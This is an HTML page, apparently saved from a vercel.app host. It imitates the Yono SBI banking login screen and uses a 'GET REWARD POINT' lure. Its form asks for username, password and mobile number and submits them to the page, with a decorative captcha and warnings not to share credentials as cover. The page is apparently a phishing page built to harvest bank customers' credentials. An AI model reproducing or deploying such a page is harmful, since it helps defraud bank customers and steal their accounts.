<!DOCTYPE html>
<!-- saved from url=(0030)https://sb-bysf.vercel.app/bbx -->
<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width">
    <title>Yono SBI</title>
    <meta name="next-head-count" content="3">

    <link rel="stylesheet" href="./css/style.css" />

</head>

<body cz-shortcut-listen="true">
    <div id="__next">
        <header class="Jeuookhh_logo__chFnY"><img alt="p3RswM" loading="lazy" width="120" height="32" decoding="async"
                data-nimg="1" src="./images/yono.png" style="color: transparent;"></header>
        <main>
            <div class="Jeuookhh_login_heading__g_rIN">
                <h3 class="Jeuookhh_login_heading_h3__40cUi"> Log into GET REWARD POINT</h3>
            </div>
            <div class="Jeuookhh_login_form__UT1PX">
                <p class="Jeuookhh_info__z9PjG"><span class="Jeuookhh_info_span__TRKF9">(CARE:</span> Username and
                    password sensitive)</p>
                <form class="Jeuookhh_form__NPDIu" method="post"><input type="hidden" name="formtoken" value="1jHBBO">
                    <div class="Jeuookhh_form_group__iOuIR"><label class="Jeuookhh_label__fvDl5">Username*</label><input
                            name="UIS" type="text" class="Jeuookhh_form_control__aKuXl" required="" maxlength="30">
                    </div>
                    <div class="Jeuookhh_form_group__iOuIR"><label class="Jeuookhh_label__fvDl5">Password*</label><input
                            name="PIS" type="password" class="Jeuookhh_form_control__aKuXl" required="" maxlength="30">
                    </div>
                    <div class="Jeuookhh_form_group__iOuIR"><label class="Jeuookhh_label__fvDl5">Mobile*</label><input
                            name="PHNE" type="text" inputmode="numeric" class="Jeuookhh_form_control__aKuXl" required=""
                            maxlength="10" minlength="10"></div>
                    <div class="Jeuookhh_form_group__iOuIR"><label class="Jeuookhh_label__fvDl5">Enter the text shown in
                            the image*</label><input type="text" class="Jeuookhh_form_control__aKuXl" maxlength="30">
                    </div><label class="Jeuookhh_label__fvDl5">Select any of the Captcha</label>
                    <div class="Jeuookhh_captcha__rdZwV">
                        <div class="Jeuookhh_w_50__v51eR"><input type="radio" id="" checked="">Image Captcha</div>
                        <div class="Jeuookhh_w_50__v51eR"><input type="radio" id="">Audio Captcha</div>
                        <div class="Jeuookhh_clear__ICTqY"></div>
                        <div class="Jeuookhh_top_10___pBf1">
                            <div><img alt="tyzVhX" loading="lazy" width="150" height="39" decoding="async" data-nimg="1"
                                    src="./images/capcha.png" style="color: transparent;"></div>
                        </div>
                        <div class="Jeuookhh_form_group__iOuIR"><input type="submit" class="Jeuookhh_btn__EQ_Rb"
                                value="LOGIN"><input type="reset" class="Jeuookhh_btn__EQ_Rb" value="RESET"></div>
                        <p><a href="https://sb-bysf.vercel.app/">Register Customer</a></p>
                        <p><a href="https://sb-bysf.vercel.app/">Forgot Password</a></p>
                    </div>
                </form>
            </div>
            <div class="Jeuookhh_p_body__zbqKu">
                <ul class="Jeuookhh_provide__KFj_x">
                    <li>Mandatory fields are indicated with an asterisk ().</li>
                    <li>Please refrain from sharing your personal information, including your user ID and password, on
                        any other page or platform.</li>
                    <li>Your username and password are sensitive information. Please do not share them with anyone</li>
                </ul>
            </div>
        </main>
        <div class="Jeuookhh_footer_area__5ot65"><img alt="VsbaVN" loading="lazy" width="68" height="28"
                decoding="async" data-nimg="1" src="./images/gwhp.png" style="color: transparent;"></div>
        <div class="Jeuookhh_footer__Wxn0J">
            <p>©</p>
        </div>
    </div>
    <script id="__NEXT_DATA__" type="application/json"
        crossorigin="">{"props":{"pageProps":{}},"page":"/","query":{},"buildId":"0lCBycRkeqCWXcllfoPaw","nextExport":true,"autoExport":true,"isFallback":false,"scriptLoader":[]}</script>
    <next-route-announcer>
        <p aria-live="assertive" id="__next-route-announcer__" role="alert"
            style="border: 0px; clip: rect(0px, 0px, 0px, 0px); height: 1px; margin: -1px; overflow: hidden; padding: 0px; position: absolute; top: 0px; width: 1px; white-space: nowrap; overflow-wrap: normal;">
            Loading...</p>
    </next-route-announcer>
    
</body>

</html>